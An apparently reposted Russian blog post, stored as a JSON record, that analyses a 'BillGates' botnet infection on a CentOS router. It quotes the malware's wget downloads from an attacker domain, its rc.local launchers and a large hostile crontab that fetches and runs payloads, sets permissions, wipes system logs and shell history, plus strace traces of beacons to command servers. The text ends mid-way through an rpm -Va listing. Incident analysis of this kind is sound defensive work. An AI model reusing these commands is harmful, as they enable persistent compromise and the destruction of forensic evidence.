{"id":213973,"date":"2014-02-26T16:53:03","date_gmt":"2014-02-26T12:53:03","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=213973"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=213973","title":{"rendered":"\u0418\u0441\u0441\u043b\u0435\u0434\u0443\u0435\u043c Linux Botnet \u00abBillGates\u00bb<\/span>"},"content":{"rendered":"
\t\"image\"\/<\/p>\n

\u041d\u0430\u043f\u0438\u0441\u0430\u043b \u043c\u043d\u0435 \u0432\u0447\u0435\u0440\u0430 lfatal1ty<\/a>, \u0433\u043e\u0432\u043e\u0440\u0438\u0442, \u0434\u043e\u043c\u0430\u0448\u043d\u0438\u0439 \u0440\u043e\u0443\u0442\u0435\u0440 \u043d\u0430 x86 \u0441 CentOS \u043a\u0430\u043a-\u0442\u043e \u0441\u0442\u0440\u0430\u043d\u043d\u043e \u0441\u0435\u0431\u044f \u0432\u0435\u0434\u0435\u0442, \u0433\u0440\u0443\u0437\u0438\u0442 \u043a\u0430\u043d\u0430\u043b \u043f\u043e\u0434 \u0433\u0438\u0433\u0430\u0431\u0438\u0442, \u0438 \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u0441\u0442\u0440\u0430\u043d\u043d\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u00abatddd\u00bb \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440. \u0420\u0435\u0448\u0438\u043b \u044f \u0437\u0430\u043b\u0435\u0437\u0442\u044c \u0438 \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c, \u0447\u0442\u043e \u0436\u0435 \u0442\u0430\u043c \u0442\u0432\u043e\u0440\u0438\u0442\u0441\u044f, \u0438 \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u043d\u044f\u043b, \u0447\u0442\u043e \u043a\u0442\u043e-\u0442\u043e \u043f\u0440\u043e\u0431\u0440\u0430\u043b\u0441\u044f \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440 \u0438 \u0441\u043e\u0432\u0435\u0440\u0448\u0430\u0435\u0442 \u0441 \u043d\u0438\u043c \u043d\u0435\u043f\u043e\u0442\u0440\u0435\u0431\u0441\u0442\u0432\u0430 \u0432\u0441\u044f\u043a\u0438\u0435. \u0412 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u0445 \u0432\u0438\u0441\u0435\u043b\u0438 wget-\u044b \u043d\u0430 \u0434\u043e\u043c\u0435\u043d dgnfd564sdf.com \u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b atddd<\/b>, cupsdd<\/b>, cupsddh<\/b>, ksapdd<\/b>, kysapdd<\/b>, skysapdd<\/b> \u0438 xfsdxd<\/b>, \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0435 \u0438\u0437 \/etc: <\/p>\n

\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n
\n
root      4741  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http:\/\/www.dgnfd564sdf.com:8080\/sksapd root      4753  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http:\/\/www.dgnfd564sdf.com:8080\/xfsdx root      4756  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http:\/\/www.dgnfd564sdf.com:8080\/cupsdd root      4757  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http:\/\/www.dgnfd564sdf.com:8080\/kysapd root      4760  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http:\/\/www.dgnfd564sdf.com:8080\/ksapd root      4764  0.0  0.0  41576  2268 ?        S    21:00   0:00 wget http:\/\/www.dgnfd564sdf.com:8080\/atdd root      4767  0.0  0.0  41576  2264 ?        S    21:00   0:00 wget http:\/\/www.dgnfd564sdf.com:8080\/skysapd <\/code><\/pre>\n
  \u041a \u0441\u043e\u0436\u0430\u043b\u0435\u043d\u0438\u044e, \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u043d\u0435 \u0434\u043e\u0434\u0443\u043c\u0430\u043b\u0441\u044f \u0441\u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u0442\u044c<\/div>\n<\/div>\n
  <\/p>\n
\u041d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u0439 \u0430\u043d\u0430\u043b\u0438\u0437<\/h4>\n
  \u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u044f \u043f\u043e\u043b\u0435\u0437 \u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c, \u0447\u0442\u043e \u0436\u0435 \u0432\u043e\u043e\u0431\u0449\u0435 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0438 \u043d\u0430\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e \u0431\u044b\u043b\u0430 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0430. \u041f\u0435\u0440\u0432\u043e\u0435, \u0447\u0442\u043e \u043c\u043d\u0435 \u043f\u0440\u0438\u0448\u043b\u043e \u0432 \u0433\u043e\u043b\u043e\u0432\u0443 \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c \u2014 \/etc\/rc.local. \u0422\u0430\u043c \u0431\u044b\u043b\u043e \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435:  <\/p>\n
cd \/etc;.\/ksapdd cd \/etc;.\/kysapdd cd \/etc;.\/atddd cd \/etc;.\/ksapdd cd \/etc;.\/skysapdd cd \/etc;.\/xfsdxd<\/code><\/pre>\n
  \u00ab\u0425\u043c\u043c, \u043b\u0430\u0434\u043d\u043e\u00bb, \u043f\u043e\u0434\u0443\u043c\u0430\u043b \u044f. \u041f\u043e\u043b\u0435\u0437 \u0432 root’\u043e\u0432\u0441\u043a\u0438\u0439 crontab<\/a>:  <\/p>\n
\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n
\n
# crontab -e # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any').# # Notice that tasks will be started based on the cron's system # daemon's notion of time and timezones. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any').# # Notice that tasks will be started based on the cron's system # daemon's notion of time and timezones. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any').# # Notice that tasks will be started based on the cron's system # daemon's notion of time and timezones. # # Output of the crontab jobs (including errors) is sent through # email to the user the crontab file belongs to (unless redirected). # # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), \u2026 *\/1 * * * * killall -9 nfsd4 \u2026 # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any').# # Notice that tasks will be started based on the cron's system # daemon's notion of time and timezones. # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. \u2026 *\/1 * * * * killall -9 profild.key \u2026 # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any').# # Notice that tasks will be started based on the cron's system \u2026 *\/1 * * * * killall -9 DDosl *\/1 * * * * killall -9 lengchao32 *\/1 * * * * killall -9 b26 *\/1 * * * * killall -9 codelove *\/1 * * * * killall -9 32 *\/1 * * * * killall -9 64 *\/1 * * * * killall -9 new6 *\/1 * * * * killall -9 new4 *\/1 * * * * killall -9 node24 *\/1 * * * * killall -9 freeBSD *\/99 * * * * killall -9 kysapd *\/98 * * * * killall -9 atdd *\/97 * * * * killall -9 kysapd *\/96 * * * * killall -9 skysapd *\/95 * * * * killall -9 xfsdx *\/94 * * * * killall -9 ksapd \u2026 # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line # indicating with different fields when the task will be run # and what command to run for the task # # To define the time you can provide concrete values for # minute (m), hour (h), day of month (dom), month (mon), # and day of week (dow) or use '*' in these fields (for 'any').# \u2026 *\/120 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/atdd *\/120 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/cupsdd *\/130 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/kysapd *\/130 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/sksapd *\/140 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/skysapd *\/140 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/xfsdx *\/120 * * * * cd \/etc; wget http:\/\/www.dgnfd564sdf.com:8080\/ksapd *\/120 * * * * cd \/root;rm -rf dir nohup.out \u2026 # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line \u2026 *\/360 * * * * cd \/etc;rm -rf dir atdd *\/360 * * * * cd \/etc;rm -rf dir ksapd *\/360 * * * * cd \/etc;rm -rf dir kysapd *\/360 * * * * cd \/etc;rm -rf dir skysapd *\/360 * * * * cd \/etc;rm -rf dir sksapd *\/360 * * * * cd \/etc;rm -rf dir xfsdx *\/1 * * * * cd \/etc;rm -rf dir cupsdd.* *\/1 * * * * cd \/etc;rm -rf dir atdd.* *\/1 * * * * cd \/etc;rm -rf dir ksapd.* *\/1 * * * * cd \/etc;rm -rf dir kysapd.* *\/1 * * * * cd \/etc;rm -rf dir skysapd.* *\/1 * * * * cd \/etc;rm -rf dir sksapd.* *\/1 * * * * cd \/etc;rm -rf dir xfsdx.* *\/1 * * * * chmod 7777 \/etc\/atdd *\/1 * * * * chmod 7777 \/etc\/cupsdd *\/1 * * * * chmod 7777 \/etc\/ksapd *\/1 * * * * chmod 7777 \/etc\/kysapd *\/1 * * * * chmod 7777 \/etc\/skysapd *\/1 * * * * chmod 7777 \/etc\/sksapd *\/1 * * * * chmod 7777 \/etc\/xfsdx *\/99 * * * * nohup \/etc\/cupsdd > \/dev\/null 2>&1& *\/100 * * * * nohup \/etc\/kysapd > \/dev\/null 2>&1& *\/99 * * * * nohup \/etc\/atdd > \/dev\/null 2>&1& \u2026 # Edit this file to introduce tasks to be run by cron. # # Each task to run has to be defined through a single line \u2026 *\/98 * * * * nohup \/etc\/kysapd > \/dev\/null 2>&1& *\/97 * * * * nohup \/etc\/skysapd > \/dev\/null 2>&1& *\/96 * * * * nohup \/etc\/xfsdx > \/dev\/null 2>&1& *\/95 * * * * nohup \/etc\/ksapd > \/dev\/null 2>&1& *\/1 * * * * echo "unset MAILCHECK" >> \/etc\/profile *\/1 * * * * rm -rf \/root\/.bash_history *\/1 * * * * touch \/root\/.bash_history *\/1 * * * * history -r *\/1 * * * * cd \/var\/log > dmesg  *\/1 * * * * cd \/var\/log > auth.log  *\/1 * * * * cd \/var\/log > alternatives.log  *\/1 * * * * cd \/var\/log > boot.log  *\/1 * * * * cd \/var\/log > btmp  *\/1 * * * * cd \/var\/log > cron  \u2026 \u2026 *\/1 * * * * cd \/var\/log > cups  *\/1 * * * * cd \/var\/log > daemon.log  *\/1 * * * * cd \/var\/log > dpkg.log  *\/1 * * * * cd \/var\/log > faillog  *\/1 * * * * cd \/var\/log > kern.log  *\/1 * * * * cd \/var\/log > lastlog *\/1 * * * * cd \/var\/log > maillog  *\/1 * * * * cd \/var\/log > user.log  *\/1 * * * * cd \/var\/log > Xorg.x.log  *\/1 * * * * cd \/var\/log > anaconda.log  *\/1 * * * * cd \/var\/log > yum.log  *\/1 * * * * cd \/var\/log > secure *\/1 * * * * cd \/var\/log > wtmp *\/1 * * * * cd \/var\/log > utmp  *\/1 * * * * cd \/var\/log > messages *\/1 * * * * cd \/var\/log > spooler *\/1 * * * * cd \/var\/log > sudolog *\/1 * * * * cd \/var\/log > aculog *\/1 * * * * cd \/var\/log > access-log *\/1 * * * * cd \/root > .bash_history *\/1 * * * * history -c \u2026 # Edit this file to introduce tasks to be run by cron. # # Edit this file to introduce tasks to be run by cron. # Edit this file to introduce tasks to be run by cron. <\/code><\/pre>\n<\/div>\n<\/div>\n
\u041e\u0445. \u0420\u0430\u0437\u043c\u0435\u0440\u043e\u043c \u043e\u043d \u0431\u044b\u043b 183\u041a\u0411, 4036 \u0441\u0442\u0440\u043e\u0447\u0435\u043a. \u0412\u044b \u043a\u043e\u0433\u0434\u0430-\u043d\u0438\u0431\u0443\u0434\u044c \u0432\u0438\u0434\u0435\u043b\u0438 crontab \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c 183\u041a\u0411? \u042f \u0432\u0438\u0434\u0435\u043b.
  \u041a \u043c\u043e\u043c\u0435\u043d\u0442\u0443, \u043a\u043e\u0433\u0434\u0430 \u044f \u0437\u0430\u0448\u0435\u043b \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440, \u044d\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u0443\u0436\u0435 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0434\u0435\u043b\u0430\u043b\u0438 (\u043d\u0435 \u0433\u0440\u0443\u0437\u0438\u043b\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0440, \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0438 \u0441\u0435\u0442\u044c). \u0420\u0435\u0448\u0438\u043b \u043e\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c crond, \u0447\u0442\u043e\u0431\u044b \u044d\u0442\u0438 \u043f\u0440\u0430\u0432\u0438\u043b\u0430 \u043d\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u043b\u0438\u0441\u044c, \u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u043f\u043e\u043a\u0430 \u043d\u0435 \u0443\u0431\u0438\u0432\u0430\u0442\u044c. \u041d\u0430\u0442\u0440\u0430\u0432\u0438\u043b \u043d\u0430 \u043d\u0438\u0445 strace<\/b>:  <\/p>\n
\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n
\n
[root@Fatalsrv etc]# strace -p 3312 Process 3312 attached - interrupt to quit [ Process PID=3312 runs in 32 bit mode. ] restart_syscall(<... resuming interrupted call ...>) = 0 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0 setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0 fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR) fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0 connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress) fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK) fcntl64(3, F_SETFL, O_RDWR)             = 0 setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0 setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0 setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\\17\\0\\0\\0\\0\\0\\0\\0", 8) = 0 send(3, "R\\r\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused) close(3)                                = 0 nanosleep({15, 0}, NULL)                = 0 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0 setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0 fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR) fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0 connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("116.10.189.246")}, 16) = -1 EINPROGRESS (Operation now in progress) fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK) fcntl64(3, F_SETFL, O_RDWR)             = 0 setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0 setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0 setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\\17\\0\\0\\0\\0\\0\\0\\0", 8) = 0 send(3, "R\\r\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0Linux 2.6.32-35"..., 401, 0) = -1 ECONNREFUSED (Connection refused) close(3)                                = 0 nanosleep({15, 0},    [root@Fatalsrv etc]# strace -p 3268 Process 3268 attached - interrupt to quit [ Process PID=3268 runs in 32 bit mode. ] recv(3, 0xfff19338, 4, 0)               = -1 ECONNRESET (Connection reset by peer) close(3)                                = 0 futex(0x816e8a8, FUTEX_WAKE, 1)         = 1 futex(0x816e8a4, FUTEX_WAKE, 1)         = 1 nanosleep({15, 0}, NULL)                = 0 socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3 setsockopt(3, SOL_SOCKET, SO_REUSEADDR, [1], 4) = 0 setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0 fcntl64(3, F_GETFL)                     = 0x2 (flags O_RDWR) fcntl64(3, F_SETFL, O_RDWR|O_NONBLOCK)  = 0 connect(3, {sa_family=AF_INET, sin_port=htons(10991), sin_addr=inet_addr("112.90.22.197")}, 16) = -1 EINPROGRESS (Operation now in progress) fcntl64(3, F_GETFL)                     = 0x802 (flags O_RDWR|O_NONBLOCK) fcntl64(3, F_SETFL, O_RDWR)             = 0 setsockopt(3, SOL_SOCKET, SO_SNDBUF, [0], 4) = 0 setsockopt(3, SOL_SOCKET, SO_LINGER, {onoff=1, linger=0}, 8) = 0 setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\\17\\0\\0\\0\\0\\0\\0\\0", 8) = 0 send(3, "R\\r\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0Linux 2.6.32-35"..., 401, 0) = 401 setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\\0\\0\\0\\0\\0\\0\\0", 8) = 0 recv(3, "\\4\\0\\0\\0", 4, 0)               = 4 setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\\17\\0\\0\\0\\0\\0\\0\\0", 8) = 0 send(3, "\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0", 27, 0) = 27 setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\\0\\0\\0\\0\\0\\0\\0", 8) = 0 recv(3, "\\4\\0\\0\\0", 4, 0)               = 4 setsockopt(3, SOL_SOCKET, SO_SNDTIMEO, "\\17\\0\\0\\0\\0\\0\\0\\0", 8) = 0 send(3, "\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\0\\1\\0\\0\\0\\0\\0\\0\\0", 27, 0) = 27 setsockopt(3, SOL_SOCKET, SO_RCVTIMEO, "<\\0\\0\\0\\0\\0\\0\\0", 8) = 0 recv(3, ^C <unfinished ...> Process 3268 detached<\/code><\/pre>\n<\/div>\n<\/div>\n
  \u041f\u0440\u043e\u0446\u0435\u0441\u0441\u044b \u043f\u043e\u0447\u0442\u0438 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u0434\u0435\u043b\u0430\u043b\u0438, \u0442\u043e\u043b\u044c\u043a\u043e \u0438\u0437\u0440\u0435\u0434\u043a\u0430 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b\u0438 \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0435 \u0441 \u043c\u0430\u0448\u0438\u043d\u044b \u0434\u0430\u043d\u043d\u044b\u0435. \u0420\u0435\u0448\u0438\u043b \u0438\u0445 \u0443\u0431\u0438\u0442\u044c, \u0440\u0430\u0437\u0443\u043c\u0435\u0435\u0442\u0441\u044f, \u0441 \u0441\u0438\u0433\u043d\u0430\u043b\u043e\u043c SIGKILL. \u041f\u043e\u0447\u0438\u0441\u0442\u0438\u043b crontab, \u043f\u043e\u0447\u0438\u0441\u0442\u0438\u043b \/etc\/rc.local, \u0443\u0434\u0430\u043b\u0438\u043b \u044d\u0442\u0438 \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0435 \u0444\u0430\u0439\u043b\u044b \u0438\u0437 \/etc (\u043a \u0441\u043b\u043e\u0432\u0443, \u043e\u043d\u0438 \u0432\u0441\u0435 \u0438\u043c\u0435\u043b\u0438 SUID-\u0431\u0438\u0442, \u0430 \u043d\u0430 \u043e\u0434\u043d\u043e\u043c \u0431\u044b\u043b Immunity-\u0431\u0438\u0442, \u0438 \u0435\u0441\u043b\u0438 \u043d\u0435 \u0437\u043d\u0430\u0442\u044c \u0438\u043b\u0438 \u043d\u0435 \u043f\u043e\u043c\u043d\u0438\u0442\u044c \u043f\u0440\u043e extended attributes \u0444\u0430\u0439\u043b\u043e\u0432, \u0442\u043e \u043c\u043e\u0436\u043d\u043e \u0434\u043e\u043b\u0433\u043e \u043b\u043e\u043c\u0430\u0442\u044c \u0433\u043e\u043b\u043e\u0432\u0443, \u043f\u043e\u0447\u0435\u043c\u0443 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435\u043b\u044c\u0437\u044f \u0441 \u043d\u0438\u043c \u0441\u0434\u0435\u043b\u0430\u0442\u044c: \u043d\u0438 \u0443\u0434\u0430\u043b\u0438\u0442\u044c, \u043d\u0438 \u0438\u0437\u043c\u0435\u043d\u0438\u0442\u044c), \u043f\u043e\u0447\u0438\u0441\u0442\u0438\u043b \/etc\/profile \u043e\u0442 422 \u0441\u0442\u0440\u043e\u0447\u0435\u043a:  <\/p>\n
unset MAILCHECK<\/code><\/pre>\n
\u0427\u0442\u043e \u043e\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0447\u0442\u043e \u0431\u043e\u0442\u043d\u0435\u0442 \u0431\u044b\u043b \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u043f\u0440\u0438\u043c\u0435\u0440\u043d\u043e 7 \u0447\u0430\u0441\u043e\u0432. \u041d\u0435 \u0442\u0430\u043a \u043c\u043d\u043e\u0433\u043e, \u043d\u043e \u0438 \u043d\u0435 \u043c\u0430\u043b\u043e, \u0437\u0430\u0430\u0440\u0445\u0438\u0432\u0438\u0440\u043e\u0432\u0430\u043b \u0432\u0441\u0435 \u0444\u0430\u0439\u043b\u044b \u0441\u0435\u0431\u0435 \u0438 \u0441\u043a\u0430\u0447\u0430\u043b \u0438\u0445.<\/p>\n
  \u0422\u0435\u043f\u0435\u0440\u044c \u043d\u0443\u0436\u043d\u043e \u043f\u0440\u043e\u0432\u0435\u0440\u0438\u0442\u044c, \u0431\u044b\u043b\u0438 \u043b\u0438 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u044b \u043a\u0430\u043a\u0438\u0435-\u0442\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0435 \u0444\u0430\u0439\u043b\u044b. \u0412 CentOS \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c:  <\/p>\n
rpm -Va<\/code><\/pre>\n
  \u0412\u044b\u0432\u043e\u0434 \u044d\u0442\u043e\u0439 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043c\u0435\u043d\u044f, \u0432 \u043e\u0431\u0449\u0435\u043c-\u0442\u043e, \u043f\u043e\u0440\u0430\u0434\u043e\u0432\u0430\u043b:  <\/p>\n
\u0421\u043a\u0440\u044b\u0442\u044b\u0439 \u0442\u0435\u043a\u0441\u0442<\/b><\/p>\n
\n
[root@Fatalsrv ~]# rpm -Va S.5....T.  c \/etc\/ppp\/chap-secrets S.5....T.  c \/etc\/issue S.5....T.  c \/etc\/crontab S.5....T.  c \/etc\/nagiosgraph\/access.conf S.5....T.  c \/etc\/nagiosgraph\/nagiosgraph.conf .M.......    \/usr\/lib\/nagiosgraph\/cgi-bin\/show.cgi .M.......    \/usr\/lib\/nagiosgraph\/cgi-bin\/showconfig.cgi .M.......    \/usr\/lib\/nagiosgraph\/cgi-bin\/showgraph.cgi .M.......    \/usr\/lib\/nagiosgraph\/cgi-bin\/showgroup.cgi .M.......    \/usr\/lib\/nagiosgraph\/cgi-bin\/showhost.cgi .M.......    \/usr\/lib\/nagiosgraph\/cgi-bin\/showservice.cgi .M.......    \/usr\/lib\/nagiosgraph\/cgi-bin\/testcolor.cgi .M.......    \/usr\/share\/nagiosgraph\/htdocs\/nagiosgraph.css .M.......    \/usr\/share\/nagiosgraph\/htdocs\/nagiosgraph.js S.5....T.    \/var\/log\/nagiosgraph\/nagiosgraph-cgi.log S.5....T.    \/var\/log\/nagiosgraph\/nagiosgraph.log missing     \/usr\/java\/jre1.7.0_40\/lib\/install.jar ....L....    \/lib\/modules\/2.6.32-358.2.1.el6.x86_64\/build S.5....T.  c \/etc\/tor\/torrc .M.......    \/ .......T.  c \/etc\/ppp\/options.pptpd S.5....T.  c \/etc\/pptpd.conf ....L....  c \/etc\/pam.d\/fingerprint-auth ....L....  c \/etc\/pam.d\/password-auth ....L....  c \/etc\/pam.d\/smartcard-auth ....L....  c \/etc\/pam.d\/system-auth S.5....T.  c \/etc\/rsyslog.conf S.5....T.  c \/etc\/rc.d\/rc.local ..5....T.  c \/etc\/sysctl.conf S.5....T.  c \/etc\/vsftpd\/vsftpd.conf .M.......    \/var\/ftp\/pub ..5....T.  c \/etc\/sysconfig\/PlexMediaServer .......T.    \/usr\/lib\/plexmediaserver\/start.sh S.5....T.  c \/etc\/sysconfig\/lm_sensors S.5....T.  c \/etc\/php.ini S.5....T.  c \/etc\/httpd\/conf\/httpd.conf .......T.    \/etc\/rc.d\/init.d\/deluge-daemon S.5....T.  c \/etc\/cacti\/db.php S.5....T.  c \/etc\/cron.d\/cacti S.5....T.  c \/etc\/httpd\/conf.d\/cacti.conf .M.......    \/usr\/share\/cacti .M.......    \/usr\/share\/cacti\/about.php .M.......    \/usr\/share\/cacti\/auth_changepassword.php .M.......    \/usr\/share\/cacti\/auth_login.php .M.......    \/usr\/share\/cacti\/cdef.php .M.......    \/usr\/share\/cacti\/cmd.php .M.......    \/usr\/share\/cacti\/color.php .M.......    \/usr\/share\/cacti\/data_input.php .M.......    \/usr\/share\/cacti\/data_queries.php .M.......    \/usr\/share\/cacti\/data_sources.php .M.......    \/usr\/share\/cacti\/data_templates.php .M.......    \/usr\/share\/cacti\/gprint_presets.php .M.......    \/usr\/share\/cacti\/graph.php .M.......    \/usr\/share\/cacti\/graph_image.php .M.......    \/usr\/share\/cacti\/graph_settings.php .M.......    \/usr\/share\/cacti\/graph_templates.php .M.......    \/usr\/share\/cacti\/graph_templates_inputs.php .M.......    \/usr\/share\/cacti\/graph_templates_items.php .M.......    \/usr\/share\/cacti\/graph_view.php .M.......    \/usr\/share\/cacti\/graph_xport.php .M.......    \/usr\/share\/cacti\/graphs.php .M.......    \/usr\/share\/cacti\/graphs_items.php .M.......    \/usr\/share\/cacti\/graphs_new.php .M.......    \/usr\/share\/cacti\/host.php .M.......    \/usr\/share\/cacti\/host_templates.php .M.......    \/usr\/share\/cacti\/images .M.......    \/usr\/share\/cacti\/images\/arrow.gif .M.......    \/usr\/share\/cacti\/images\/auth_deny.gif .M.......    \/usr\/share\/cacti\/images\/auth_login.gif .M.......    \/usr\/share\/cacti\/images\/auth_logout.gif .M.......    \/usr\/share\/cacti\/images\/button_add.gif .M.......    \/usr\/share\/cacti\/images\/button_cancel.gif .M.......    \/usr\/share\/cacti\/images\/button_cancel2.gif .M.......    